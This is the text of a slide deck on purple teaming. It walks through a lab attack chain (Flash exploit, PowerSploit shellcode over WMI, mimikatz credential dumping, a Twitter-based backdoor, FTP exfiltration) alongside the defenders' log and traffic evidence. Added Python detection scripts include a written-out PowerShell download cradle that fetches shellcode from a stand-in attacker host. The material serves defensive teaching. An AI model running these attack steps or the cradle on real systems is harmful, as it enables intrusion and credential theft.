Purple View
The recent trend of using Attack and Defense together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
Quick: who are we?
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science
(Security/Privacy)
Interested in both sides of security
Loooooves presenting
Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run-through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defender's View
○ Possible Purple Team exercises
Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight gaps in security controls, detection, etc.
● Escape and Evade for Persistence
Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Red Team sitting with the Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers or block IP addresses; keep it realistic
Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
Purple Team - DEMO (step by step)
Our exercise
Purple Team - Demo Architecture
Domain: corp.test.com
Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
Setting up Windows Group Policy (GP)
Gaining Access
Hacking Team Flash Exploit
Flash Exploits
● Flash plugins are vulnerable
○ You can embed JavaScript or a binary within a Flash file
○ ActionScript is used to define events that redirect to the landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default with the browser
● New vulnerabilities are identified on almost a weekly basis
Gaining Access
Flash 18.0.0.194
A: Flash Exploit from SecurityFocus
Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali
A: Redirect Victim
Client1 user navigates to a malicious site which redirects to the exploit
A: Client1 is exploited
A: A session is now established with Client1
We can now run Meterpreter
B: Wireshark: Landing Page and Redirect
B: Wireshark: Shell
B: What can you take away?
Security Onion: implement it, it's free
It has Snort rules for Flash exploits (they need to be installed)
Confirm whether Flash is needed for business reasons
Keep Flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps the blue team identify suspicious traffic and understand what is happening from the attacker's perspective
● Red team sees how its attacks are visible to the blue team and thinks of ways to make them stealthier
Privilege Escalation
Not Shown
Privilege Escalation
● We are skipping privilege escalation from Domain User to Local Admin
Lateral Movement
PowerSploit
A: PowerSploit
Available on Github
Open Source
https://github.com/mattifestation/PowerSploit
A: PowerSploit
More than 1 script!
PowerShell Modules
PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
A: Lateral Movement
Same Passwords for All Local Admins
A: Lateral Movement
PowerSploit
Remote PowerShell
Using Invoke-Shellcode.ps1
A: Base64 Encoding Payload
Removes issues with whitespace
The Hacker Playbook 1 (now 2)
http://thehackerplaybook.com/dashboard/
A: Hosting PowerSploit Invoke-Shellcode.ps1
PowerSploit code hosted on the local Kali machine
A: Invoke-WmiMethod
Use PowerShell to connect remotely, create a new process and launch the IEX cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
A: Client1 gives the same password
Same password across multiple clients
A: Receive Shell
B: Wireshark traffic
TCP handshake
Bind requests
B: Client1 requests remote instance on Client2
B: Client2 eventually asks where Kali is
B: Client2 downloads Invoke-Shellcode.ps1
B: Client1 logs into Client2
B: PowerShell Process Created
B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
B: What can you take away?
Event correlation: based on event ID, source and destination for remote connections
Implement alerting that combines several Security events together
A SIEM can (and SHOULD) do this
Use Log-MD: a really great logging tool, especially for PowerShell
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
Privilege Escalation
Local Admin to Domain Admin
A: Local Admin to Domain Admin
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over Active Directory!
● Access IT resources
● Create accounts
● Propagate malware
A: Local Admin to Domain Admin
From Client1, map the ADMIN$ share on Client2 and copy over sekurlsa.dll
A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
B: Wireshark
B: Event Logs
Client1 logs into Client2 as local admin
B: Event Logs
Client1 runs mimikatz on Client2
B: Event Logs
Sensitive privilege use from Client1 to Client2
B: What can you take away
● Prevention:
○ Access control for shared drive
○ Limit access to psexec and monitor use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - Event correlation between system logs and network proxy logs
○ For lateral movement: enable file level auditing
○ Canary accounts
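As an added example (not part of the slides), here is a small correlation script in the spirit of the "Event Correlation" takeaway from the lateral movement section and the "SIEM use case" takeaway above: it chains a network logon (Security event 4624, logon type 3) to a PowerShell download cradle (4688, with command-line logging enabled by Group Policy), and ADMIN$ share access (5140) to a service install (System event 7045) plus sensitive privilege use (4672). The events, host names, IPs and user names are constructed lab values, and the five-minute window is an assumption.

```python
"""Event-log correlation for the lateral-movement and local-admin-to-domain-admin
steps of the demo. All events below are constructed sample records, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed: how close together the steps must be
CRADLE_MARKERS = ("downloadstring", "iex", "invoke-expression", "-enc", "-encodedcommand")

# Constructed Windows events (Security log unless noted), modelled on the
# demo's Client1 (10.0.0.11) -> Client2 hop; 10.0.0.5 stands in for the Kali box.
SAMPLE_EVENTS = [
    # Client1 logs on to Client2 over the network as the shared local admin.
    {"time": "2016-03-01T10:00:01", "host": "CLIENT2", "id": 4624,
     "user": "Administrator", "logon_type": 3, "src_ip": "10.0.0.11"},
    # WMI Win32_Process spawns PowerShell running the download cradle.
    # Command-line capture for 4688 must be switched on via Group Policy.
    {"time": "2016-03-01T10:00:03", "host": "CLIENT2", "id": 4688,
     "user": "Administrator", "process": "powershell.exe",
     "cmdline": "powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                ".DownloadString('http://10.0.0.5/Invoke-Shellcode.ps1')"},
    # ADMIN$ mapped from Client1, a PsExec-style service installed (System log
    # 7045), then sensitive privileges used by the new logon.
    {"time": "2016-03-01T10:01:10", "host": "CLIENT2", "id": 5140,
     "user": "Administrator", "share": "\\\\*\\ADMIN$", "src_ip": "10.0.0.11"},
    {"time": "2016-03-01T10:01:15", "host": "CLIENT2", "id": 7045,
     "user": "Administrator", "service": "PSEXESVC"},
    {"time": "2016-03-01T10:01:16", "host": "CLIENT2", "id": 4672,
     "user": "Administrator", "privileges": "SeDebugPrivilege"},
    # Benign noise: an interactive logon and an ordinary scheduled script on Client1.
    {"time": "2016-03-01T10:05:00", "host": "CLIENT1", "id": 4624,
     "user": "alice", "logon_type": 2, "src_ip": "-"},
    {"time": "2016-03-01T10:05:30", "host": "CLIENT1", "id": 4688,
     "user": "alice", "process": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def _by_host(events):
    """Group events per host, sorted by time, so each rule only compares events on one machine."""
    grouped = defaultdict(list)
    for ev in events:
        grouped[ev["host"]].append(ev)
    for evs in grouped.values():
        evs.sort(key=_ts)
    return grouped


def detect_remote_powershell(events):
    """Network logon (4624, type 3) followed within WINDOW by a PowerShell process
    (4688) for the same user whose command line looks like a download cradle."""
    alerts = []
    for host, evs in _by_host(events).items():
        logons = [e for e in evs if e["id"] == 4624 and e.get("logon_type") == 3]
        for proc in evs:
            if proc["id"] != 4688 or "powershell" not in proc.get("process", "").lower():
                continue
            cmd = proc.get("cmdline", "").lower()
            if not any(marker in cmd for marker in CRADLE_MARKERS):
                continue
            for lg in logons:
                if lg["user"] == proc["user"] and timedelta(0) <= _ts(proc) - _ts(lg) <= WINDOW:
                    alerts.append({"rule": "remote_powershell_cradle", "host": host,
                                   "user": proc["user"], "src_ip": lg["src_ip"],
                                   "time": proc["time"]})
                    break
    return alerts


def detect_psexec_privilege_use(events):
    """ADMIN$ share access (5140) followed within WINDOW by a service install (7045)
    and sensitive privilege use (4672) by the same user on the same host."""
    alerts = []
    for host, evs in _by_host(events).items():
        shares = [e for e in evs if e["id"] == 5140 and e.get("share", "").upper().endswith("ADMIN$")]
        for share in shares:
            later = [e for e in evs if timedelta(0) <= _ts(e) - _ts(share) <= WINDOW]
            svc = next((e for e in later if e["id"] == 7045), None)
            priv = next((e for e in later if e["id"] == 4672 and e["user"] == share["user"]), None)
            if svc and priv:
                alerts.append({"rule": "admin_share_psexec_privilege", "host": host,
                               "user": share["user"], "src_ip": share["src_ip"],
                               "service": svc["service"], "time": priv["time"]})
    return alerts


def run_all(events=SAMPLE_EVENTS):
    """Run both rules; the sample data yields exactly one alert per rule."""
    return detect_remote_powershell(events) + detect_psexec_privilege_use(events)


if __name__ == "__main__":
    for alert in run_all():
        print(alert)
```

On the sample data the benign logon and script on Client1 raise nothing, while both stages of the Client2 chain are reported with the source IP of Client1.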
Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been considered
○ Learns how an attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind by this attack and possibly how to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Provide more thorough recommendations
Twittor
Backdoor using Twitter
A: Twittor
● Easy to install
● Easy to Use
● Easy to add shellcode
https://github.com/PaulSec/twittor
A: Twittor - insides
Simple subprocess execution
Commands are stored as base64-encoded messages
A: Pyinstaller
On GitHub
Turns a Python file into an EXE
https://github.com/pyinstaller/pyinstaller
A: Pyinstaller
Python File becomes Executable
Twittor: Backdoor Using Twitter
A: Twittor
Python file used as C2 server
Python file used as backdoor (EXE via PyInstaller)
A: Twittor - Retrieving command
Send Command to execute
Retrieve command
B: Twittor - Network Traffic
Reaching out to API
Normal User Traffic??
B: Twittor - Client system
Backdoor as a Python executable compiled with PyInstaller's --noconsole flag to hide output
B: Traffic from Client
Reaches out to Twitter
Source and destination are internal IPs; the client sends to the API
B: What can you take away?
Check if there are any remote connections after hours; are they against policy?
Again, correlate logs with known C2 addresses
See if AV picks it up
Purple Team - Benefits
Test if a C2 can reach out to twitter.
Social media may be blocked via the browser, but some sites can still be accessed via their API, etc.
If it is not blocked, why not? Can your blue team help to stop this and others?
Data Exfiltration
Clear Text FTP
A: Data Exfiltration Through Clear Text FTP
A: FTP Exfiltration
Finding data to exfiltrate
A: Finding data
Important data identified
A: Downloading data
A: Data Transferred
B: Meterpreter connection
DLL injection
Lots of chatter
B: FTP connection
Clear Text
B: Successful Transfer
B: What can you take away?
Disable FTP: there should not really be a business need for it
If there is a business need, whitelist those IP addresses and create a group of users specifically for FTP
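Added example (not from the slides) covering both the Twittor takeaway (after-hours remote connections, traffic to a social-media API that is not a person browsing) and the FTP takeaway above (FTP only from whitelisted addresses): it scans constructed proxy/flow records and flags social-media API traffic that is after hours or not from a browser, and port-21 FTP from any source outside an allow list. The business hours, API host list, allow list, IPs (RFC 5737 documentation ranges) and user agents are assumptions.

```python
"""Flag two kinds of traffic from the demo in proxy/flow records: outbound
social-media API use that does not look like a person browsing (Twittor-style
C2) and clear-text FTP from hosts with no approved need (exfiltration).
All records are constructed samples."""
from datetime import datetime

BUSINESS_HOURS = range(8, 18)            # assumed: 08:00-17:59 local time
SOCIAL_API_HOSTS = ("api.twitter.com",)  # extend with other API endpoints
FTP_ALLOWED_SOURCES = {"10.0.0.30"}      # assumed: the one host approved for FTP
BROWSER_UA_PREFIXES = ("Mozilla/",)      # crude but catches scripted clients

# Constructed log lines: time,src_ip,dst_ip,dst_port,dst_host,user_agent
SAMPLE_LOG = """\
2016-03-01T23:14:05,10.0.0.12,203.0.113.10,443,api.twitter.com,python-requests/2.9.1
2016-03-01T12:30:00,10.0.0.20,203.0.113.10,443,api.twitter.com,Mozilla/5.0 (Windows NT 6.1)
2016-03-01T12:31:00,10.0.0.12,203.0.113.10,443,api.twitter.com,python-requests/2.9.1
2016-03-01T23:20:11,10.0.0.12,198.51.100.7,21,-,-
2016-03-01T09:00:00,10.0.0.30,198.51.100.7,21,-,-
2016-03-01T09:05:00,10.0.0.20,203.0.113.20,443,www.example.com,Mozilla/5.0 (Windows NT 6.1)
"""


def parse_log(text):
    """Turn the comma-separated lines into records; the user agent may contain spaces."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, src, dst, port, host, ua = line.split(",", 5)
        records.append({"time": datetime.fromisoformat(t), "src_ip": src, "dst_ip": dst,
                        "dst_port": int(port), "dst_host": host, "user_agent": ua})
    return records


def flag_social_api_c2(records):
    """A social-media API host contacted outside business hours or by a non-browser client."""
    alerts = []
    for r in records:
        if r["dst_host"] not in SOCIAL_API_HOSTS:
            continue
        reasons = []
        if r["time"].hour not in BUSINESS_HOURS:
            reasons.append("after_hours")
        if not r["user_agent"].startswith(BROWSER_UA_PREFIXES):
            reasons.append("non_browser_client")
        if reasons:
            alerts.append({"src_ip": r["src_ip"], "dst_host": r["dst_host"],
                           "time": r["time"].isoformat(), "reasons": reasons})
    return alerts


def flag_cleartext_ftp(records):
    """FTP control connections (port 21) from any host not on the allow list."""
    return [{"src_ip": r["src_ip"], "dst_ip": r["dst_ip"], "time": r["time"].isoformat()}
            for r in records
            if r["dst_port"] == 21 and r["src_ip"] not in FTP_ALLOWED_SOURCES]


def summarize(text=SAMPLE_LOG):
    """Run both checks over a log and return the alerts keyed by check."""
    records = parse_log(text)
    return {"c2": flag_social_api_c2(records), "ftp": flag_cleartext_ftp(records)}


if __name__ == "__main__":
    for kind, alerts in summarize().items():
        for alert in alerts:
            print(kind, alert)
```

On the sample log the 10.0.0.12 host is reported twice for the API (once after hours and once for its scripted client) and once for FTP, while the approved FTP host and the daytime browser session stay quiet.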
Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
Conclusion
Purple Teaming is Good
Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
● Could be extended for enterprise security tools such as SIEM/IDS
● PowerShell/WMI for blue team
● More advanced attacks, persistence using PowerShell Empire
Obligatory Cute Kat Picture
References are in following slides
Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
A: Downloads PowerShell file
Client2 reaches out to Kali machine
Platform Security IRL:  Busting Buzzwords & Building BetterPlatform Security IRL:  Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
 
Wordpress security
Wordpress securityWordpress security
Wordpress security
 
2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection2023 NCIT: Introduction to Intrusion Detection
2023 NCIT: Introduction to Intrusion Detection
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
 

More from Haydn Johnson

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkHaydn Johnson
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-finalHaydn Johnson
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about itHaydn Johnson
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Haydn Johnson
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017Haydn Johnson
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017Haydn Johnson
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonHaydn Johnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonHaydn Johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awarenessHaydn Johnson
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthroughHaydn Johnson
 

More from Haydn Johnson (11)

Introduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalkIntroduction to Just in Time Access - BrightTalk
Introduction to Just in Time Access - BrightTalk
 
Communication hack fest-2018-final
Communication hack fest-2018-finalCommunication hack fest-2018-final
Communication hack fest-2018-final
 
Kubernetes - security you need to know about it
Kubernetes - security you need to know about itKubernetes - security you need to know about it
Kubernetes - security you need to know about it
 
Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018Human(e) Security in a World of Business 2018
Human(e) Security in a World of Business 2018
 
UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017UOIT Purple Team - Student Edition 2017
UOIT Purple Team - Student Edition 2017
 
PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017PT_OWASP_AUSTIN_2017
PT_OWASP_AUSTIN_2017
 
Phishing dc618 haydnjohnson
Phishing dc618 haydnjohnsonPhishing dc618 haydnjohnson
Phishing dc618 haydnjohnson
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
 
Nolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnsonNolacon phishing 2017_haydn_johnson
Nolacon phishing 2017_haydn_johnson
 
Meterpreter awareness
Meterpreter awarenessMeterpreter awareness
Meterpreter awareness
 
Power sploit persistence walkthrough
Power sploit persistence walkthroughPower sploit persistence walkthrough
Power sploit persistence walkthrough
 

Recently uploaded

Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024TopCSSGallery
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxfnnc6jmgwh
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 

Recently uploaded (20)

Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 

Purple View

  • 1. Purple View The recent trend of using Attack and Defense Together Not OUR idea - backed by many @raffertylaura | @haydnjohnson
